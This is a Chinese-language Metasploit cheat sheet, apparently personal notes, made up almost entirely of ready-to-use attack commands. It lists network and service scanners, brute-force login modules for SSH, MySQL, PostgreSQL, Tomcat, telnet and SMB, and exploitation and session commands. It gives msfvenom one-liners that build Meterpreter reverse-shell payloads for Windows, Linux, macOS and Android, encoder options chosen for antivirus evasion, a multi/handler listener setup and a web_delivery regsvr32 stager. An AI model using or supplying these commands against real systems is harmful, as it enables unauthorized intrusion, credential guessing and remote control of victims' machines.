msf> search portscan msf> use auxiliary/scanner/postscan/syn
smb_version 模块: msf> use auxiliary/scanner/smb/smb_version 找 mssql 主机: msf> use auxiliary/scanner/mssql/mssql_ping SSH 服务器扫描: msf> use auxiliary/scanner/ssh/ssh_version Telnet服务器扫描 msf> use auxiliary/scanner/telnet/telnet_version FTP 主机扫描: msf> use auxiliary/scanner/ftp/ftp_version FTP 匿名登录: useauxiliary/scanner/ftp/anonymos 扫描局域网内有哪些主机存活 useauxiliary/scanner/discovery/arp_sweep 扫描网站目录 auxiliary/scanner/http/dir_scanner 搜索网站中的E-mail地址 search_email_collector use auxiliary/gather/search_email_collector 嗅探抓包 msf> use auxiliary/sniffer/psnuffle
msf密码破解模块
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
ssh服务口令猜测 use auxiliary/scanner/ssh/ssh_login mysql口令攻击 search mysql use auxiliary/scanner/mysql/mysql_login postgresql攻击 search postgresql use auxiliary/scanner/postgres/postgres_login tomcat 攻击 search tomcat use auxiliary/scanner/http/tomcat_mgr_login telnet 攻击 use auxiliary/scanner/telnet/telnet_login samba攻击 use auxiliary/scanner/smb/smb_login
常用漏洞利用命令 search <name> 用指定关键字搜索可利用漏洞 use <exploitname> 使用漏洞 show options 显示选项 set <OPTIONNAME><option> 设置选项 show payloads 显示装置 show targets 显示目标(os版本) set TARGET <targetnumber> 设置目标版本 exploit 开始漏洞攻击 sessions -l 列出会话 sessions -i <ID> 选择会话 sessions -k <ID> 结束会话 <ctrl> z 把会话放到后台 <ctrl> c 结束会话 show auxiliary 显示辅助模块 use <auxiliaryname> 使用辅助模块 set <OPTIONNAME><option> 设置选项 run 运行模块
a. -p:指定payload,一般用 windows/meterpreter/reverse_tcp 比较多 b. -e:指定要用的编码器,一般用 shikata_ga_nai ,其他的都不太好用 c. -i:指定编码次数,后面跟数字,如:-i 8 d. -b:设定规避字符集,指定需要过滤的坏字符,如:'\x0f'、'\x00' e. -f:指定输出格式,如:-f exe f. -o:指定生成文件存放位置,也可用>代替 g. -l:列出指定模块的所有可用资源 h. -a:指定payload的目标架构,如x86,x64,x86_64,默认为32位程序 i. -s:设定payload的最大长度,即文件大小 j. --platform:指定payload的目标平台,如windows,linux k. 其余参数可用 -h 查看 例子:msfvenom -p windows/meterpreter/reverse_tcp lhost=<IP> lport=<port> -f exe -o payload.exe
建立监听
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
1. 常规监听 msfconsole:进入msf控制台 use exploit/multi/handler:使用模块 set payload windows/meterpreter/reverse_tcp:设置payload set lhost <ip>:设置要侦听的ip set lport <port>:设置要侦听的端口 options:查看设置详情) run或exploit 2. 快速监听:默认持续侦听 msfconsole:进入msf控制台 handler -H <ip> -P <port> -p <payload> 3. 其他 exploit -j -z:后台持续监听,-j是后台任务,-z是持续监听,使用jobs查看和管理 jobs -K可结束所有任务。 sessions -l:查看我的会话 sessions -i 1:调用我的1号会话
Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=1122 -a x86 --platform Linux -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=1122 -f exe > shell.exe Mac msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho Android msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST= LPORT=1122 -f raw > shell.apk msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=1122 R > test.apk 安卓免杀 rat yutube
use exploit/multi/script/web_delivery set target 2 target regsvr32 windows/64/meterpreter/reverse_tcp set payload windows/meterpreter/reverse_tcp set LHOST 192.168.3.143 set URIPATH / exploit